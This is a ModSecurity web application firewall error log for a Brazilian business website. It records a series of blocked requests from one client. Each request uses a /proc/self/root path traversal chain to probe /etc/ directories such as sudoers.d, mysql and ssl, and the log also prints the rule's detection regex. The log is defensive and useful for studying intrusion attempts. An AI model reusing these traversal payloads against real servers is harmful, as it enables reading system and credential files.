[Mon Mar 16 12:23:50.602833 2026] [:error] [pid 10831:tid 140411708356352] [client 74.7.243.203:43144] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abggho6lpbStxTqkSktqRQAAAkQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:23:51.994919 2026] [:error] [pid 10831:tid 140411624429312] [client 74.7.243.203:43148] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abggh46lpbStxTqkSktqRgAAAk4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:23:53.371328 2026] [:error] [pid 10772:tid 140411741927168] [client 74.7.243.203:43156] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abggif9ocpUE4ed4uDzsXwAAAgA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:23:54.747500 2026] [:error] [pid 21805:tid 140411666392832] [client 74.7.243.203:43162] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abggirABkC4fWIHEf8HosgAAAEk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:23:56.059365 2026] [:error] [pid 21806:tid 140411599251200] [client 74.7.243.203:43170] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abggjNSswJuvopo3lOhb4gAAAJE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:23:56.093249 2026] [:error] [pid 21805:tid 140411624429312] [client 74.7.244.31:33276] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abggjLABkC4fWIHEf8HotAAAAE4"]
[Mon Mar 16 12:23:57.408678 2026] [:error] [pid 21805:tid 140411565680384] [client 74.7.243.203:43180] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abggjbABkC4fWIHEf8HotQAAAFU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:23:59.734342 2026] [:error] [pid 10831:tid 140411590858496] [client 74.7.243.203:43188] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abggj46lpbStxTqkSktqSwAAAlI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:24:01.080093 2026] [:error] [pid 32654:tid 140411599251200] [client 74.7.243.203:42132] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abggkQlT9VtDQc7bgUyu1gAAARE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:24:02.365127 2026] [:error] [pid 21946:tid 140411683178240] [client 74.7.243.203:42140] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abggknbQATo66fKoS7xNVgAAAMc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:24:03.547083 2026] [:error] [pid 32654:tid 140411540502272] [client 74.7.243.203:42156] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abggkwlT9VtDQc7bgUyu2AAAARg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:24:04.821084 2026] [:error] [pid 21806:tid 140411683178240] [client 74.7.243.203:42162] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgglNSswJuvopo3lOhb4wAAAIc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:24:06.135945 2026] [:error] [pid 32654:tid 140411716749056] [client 74.7.243.203:42178] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgglglT9VtDQc7bgUyu2QAAAQM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:24:07.328634 2026] [:error] [pid 10772:tid 140411582465792] [client 74.7.243.203:42188] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abggl_9ocpUE4ed4uDzsYAAAAhM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:24:08.624459 2026] [:error] [pid 32654:tid 140411674785536] [client 74.7.243.203:42192] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abggmAlT9VtDQc7bgUyu2gAAAQg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:24:09.765155 2026] [:error] [pid 32654:tid 140411708356352] [client 74.7.243.203:42194] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abggmQlT9VtDQc7bgUyu3AAAAQQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:24:11.131773 2026] [:error] [pid 10772:tid 140411699963648] [client 74.7.243.203:48572] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abggm_9ocpUE4ed4uDzsYQAAAgU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:24:12.319489 2026] [:error] [pid 11972:tid 140411624429312] [client 74.7.243.203:48580] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abggnJqj1wV0Si-OkefrxwAAAA4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:24:14.038138 2026] [:error] [pid 11972:tid 140411607643904] [client 74.7.243.203:48582] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abggnZqj1wV0Si-OkefryAAAABA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:24:15.324198 2026] [:error] [pid 21806:tid 140411574073088] [client 74.7.243.203:48590] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abggn9SswJuvopo3lOhb5AAAAJQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:24:16.668752 2026] [:error] [pid 10709:tid 140411582465792] [client 74.7.243.203:48592] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abggoBXjF1vJNtV6CWrz1AAAAdM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 12:24:17.981296 2026] [:error] [pid 21946:tid 140411649607424] [client 74.7.243.203:48596] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abggoXbQATo66fKoS7xNWQAAAMs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
